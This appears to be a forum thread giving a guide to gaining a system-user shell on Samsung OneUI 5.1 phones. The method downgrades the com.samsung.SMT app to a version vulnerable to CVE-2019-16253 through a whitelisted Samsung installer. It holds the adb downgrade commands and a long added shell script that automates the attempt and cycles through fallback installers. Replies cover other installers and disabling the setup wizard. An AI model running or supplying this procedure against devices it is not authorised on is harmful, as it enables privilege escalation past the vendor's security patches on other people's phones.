[GUIDE] SMT SYSTEM SHELL ACCESS ON SAMSUNG ONEUI 5.1 [March & April Update]


Camlin3

Senior Member
Jun 28, 2016
634
177

Background:

It all started back in 2019, when @flanker017 revealed a major bug in Samsung's in-house TTS engine APK (com.samsung.SMT) that allowed a third-party app to send a malicious intent making the engine load an attacker-chosen library as a system shared library, which can then invoke a shell as the system user. Samsung patched it and issued an updated app.

Original CVE: CVE-2019-16253
Original GitHub repo of the PoC: SMT-CVE-2019-16253
Original write-up: Flanker017 Blog

Present Time in 2023:

In January another user, @K0mraid3, leveraged a malfunctioning ADB command that allows downgrading any system app to any version, as long as the build SDK supports it, to reinstall the vulnerable version code 300200002. Samsung issued a patch in the OneUI 5.1 March update to block downgrading of system apps by normal users, but the downgrade path was still permitted for selected installers; any other installer gets the error
Failure [-3005: INSTALL_FAILED_ADP_VERSION_LOCKED]


This check does not exist in AOSP code. Looking further into Samsung internal sources, I found that Samsung heavily customises various AOSP APIs to its own needs, so the patch was introduced to moderately mitigate the vulnerability rather than as a concrete solution: it still leaves Samsung room to roll back system app updates or push other updates without future hassle. That is where another backdoor for downgrading system apps comes in.

Samsung has its own package installer, package id com.sec.android.preloadinstaller, which internally drives system updates and other updates of Samsung apps. Samsung was careful, or lazy, enough to whitelist its own package installer for downgrading system apps, debuggable or not; that installer also falls under the wider purview of Samsung's in-house security daemon ASKSMANAGER, which whitelists it to perform package installations with relaxed restrictions. And thanks to Android's PackageManager, the installer package id can be supplied for any app installation.


TLDR; we are going to use a "secret" installer to downgrade our target app to a vulnerable version on the latest OneUI 5.1 March/April update:
Code:
adb install -d -i com.sec.android.preloadinstaller vulnerable_com.samsung.SMT.apk
or
adb shell pm install -d -i com.sec.android.preloadinstaller vulnerable_com.samsung.SMT.apk

Results:

(screenshots: scrennshot.png, screencap3.png, screencap4.png)


Epilogue:

Finally Google stepped in as a knight in shining armour for Samsung and put the last nail in the coffin for any further fun with the May Android Security Update. System apps can now no longer be downgraded below the factory-installed version.
More details: Google Git; CVE-2023-21116

adiós, amigo !
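The procedure above, as an added shell example that is not part of the original post and not a Samsung or Google tool: it reads the installed versionCode of com.samsung.SMT, checks the device's security patch level against the May 2023 fix (CVE-2023-21116) before wasting time, and classifies the result of `adb install -d -i <installer>` so that the -3005 installer lock, a hard downgrade refusal and a success are told apart. It tries the whitelisted installer from the post first and then the two names suggested later in the thread. Two things are assumptions of mine, not facts from the page: that a device carrying the May 2023 patch reports the generic INSTALL_FAILED_VERSION_DOWNGRADE result when it refuses, and that the fallback installers are worth trying at all.

```shell
#!/bin/sh
# Added example for this thread (not the OP's code, not a Samsung or Google tool).
# Wraps the downgrade attempt from the post in the checks a practitioner wants:
#   1. read the installed versionCode of com.samsung.SMT from dumpsys,
#   2. compare the security patch level against the May 2023 fix (CVE-2023-21116),
#   3. classify the `adb install -d -i <installer>` result.
# ASSUMPTION (not on the page): a post-May-2023 device refuses the downgrade with the
# generic INSTALL_FAILED_VERSION_DOWNGRADE result; the two fallback installer names
# come from replies in the thread and may or may not help.

SMT_PKG="com.samsung.SMT"
SMT_VULN_VERSION=300200002            # vulnerable versionCode named in the post
MAY_2023_PATCH="2023-05-01"           # first patch level carrying the CVE-2023-21116 fix
# Whitelisted installer from the post first, then the fallbacks suggested in the replies.
INSTALLERS="com.sec.android.preloadinstaller com.samsung.android.seinstaller PrePackageInstaller"

# installed_version_code: print the first versionCode= value found in
# `adb shell dumpsys package <pkg>` output supplied on stdin.
installed_version_code() {
  sed -n 's/^[[:space:]]*versionCode=\([0-9][0-9]*\).*/\1/p' | head -n 1
}

# patch_level_is_before A B: succeed when patch level A (YYYY-MM-DD, the format of
# ro.build.version.security_patch) is older than B. Dashes are stripped so the
# dates compare as integers in plain POSIX sh.
patch_level_is_before() {
  a=$(printf '%s' "$1" | sed 's/-//g')
  b=$(printf '%s' "$2" | sed 's/-//g')
  [ "$a" -lt "$b" ]
}

# classify_install_output: reduce adb/pm install output on stdin to one token.
classify_install_output() {
  out=$(cat)
  case "$out" in
    *INSTALL_FAILED_ADP_VERSION_LOCKED*) echo installer_locked ;;   # March/April OneUI 5.1 check: installer not whitelisted
    *INSTALL_FAILED_VERSION_DOWNGRADE*)  echo downgrade_blocked ;;  # PackageManager refused (assumed post-May result, or -d missing)
    *Success*)                           echo downgraded ;;
    *)                                   echo unknown ;;
  esac
}

# needs_downgrade CODE: succeed when the installed versionCode is above the vulnerable one.
needs_downgrade() {
  [ -n "$1" ] && [ "$1" -gt "$SMT_VULN_VERSION" ]
}

# attempt_downgrade APK: the live procedure, for a connected device with USB debugging.
# Walks the installer list and stops at the first success or hard refusal.
attempt_downgrade() {
  apk="$1"
  patch=$(adb shell getprop ro.build.version.security_patch | tr -d '\r')
  if ! patch_level_is_before "$patch" "$MAY_2023_PATCH"; then
    echo "patch level $patch: downgrade below factory version is closed (CVE-2023-21116)"
    return 1
  fi
  current=$(adb shell dumpsys package "$SMT_PKG" | installed_version_code)
  if [ -z "$current" ]; then
    echo "could not read versionCode of $SMT_PKG"
    return 1
  fi
  if ! needs_downgrade "$current"; then
    echo "$SMT_PKG versionCode $current is already at or below $SMT_VULN_VERSION"
    return 0
  fi
  for inst in $INSTALLERS; do
    result=$(adb install -d -i "$inst" "$apk" 2>&1 | classify_install_output)
    echo "$inst: $result"
    [ "$result" = downgraded ] && return 0
    [ "$result" = downgrade_blocked ] && return 1   # another installer will not change this
  done
  return 1
}

# Offline demonstration on constructed output (no device needed):
printf '    versionCode=300200002 minSdk=28 targetSdk=33\n' | installed_version_code      # 300200002
printf 'Failure [-3005: INSTALL_FAILED_ADP_VERSION_LOCKED]\n' | classify_install_output   # installer_locked
```

Usage on a real device is `attempt_downgrade vulnerable_com.samsung.SMT.apk`. Note that `adb install` pushes the APK itself, whereas the `adb shell pm install` form in the post needs the file already on the device (for example under /data/local/tmp); the classifier works on the output of either.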
 

Camlin3

Senior Member
Jun 28, 2016
634
177
Using "com.sec.android.preloadinstaller" does not work for Samsung watches on the 1 April 2023 patch... results are yielding downgrade failure
What is the exact error message and code?
Are you sure its Android security update is 1 April 2023 and not 1 May 2023? Try these installers:
Code:
"com.samsung.android.seinstaller"
"PrePackageInstaller"
 
Absolutely sure, nothing visible in the logs, as the app used belongs to @BLuFeNiX; mine is a tweaked version to work on the watch. For the April patch, the SMT and the preloadinstaller both give downgrade failure...

I will try the other two and see...
But it might be that the watch got its update and was patched before the phone 🤔...

Will keep you updated...
Screenshot_20230514_134815_settings.png
 

Camlin3

Senior Member
Jun 28, 2016
634
177
Neither of those works, so I am assuming the watch's April 2023 security patch has it fixed...
What is the error code?
 

nguyenlucky

Senior Member
Jan 30, 2013
530
194
danang
Hi @wr3cckl3ss1, thank you for your work. I got a system shell on my S23U (S918B) on the April update.

Do you know what command I can use to enable the second physical SIM slot on my device? It's an Australian version with only one physical SIM slot.

Changing the CSC and doing a factory reset makes it recognise the second physical SIM until I finish the setup wizard, where it gets disabled again. Hence it must be a software thing.

It has 2 distinct IMEIs and supports DSDS with a physical SIM and an eSIM.
 
To my knowledge there is no command to do this. But if you're saying it happens right after finishing the setup wizard, don't finish it, or at least get as close as possible to finishing. Get a shell or system shell through the PC and disable or uninstall the package for the setup wizard. Reboot and see if you can see the second SIM like you want.
 

nguyenlucky

Senior Member
Jan 30, 2013
530
194
danang
How can I enable adb during the setup wizard?
 

Top Liked Posts

BLuFeNiX, see and update your tool!

Already did it... and since you made the post available now, I'll be forking soon and uploading my version of this... ENJOY the video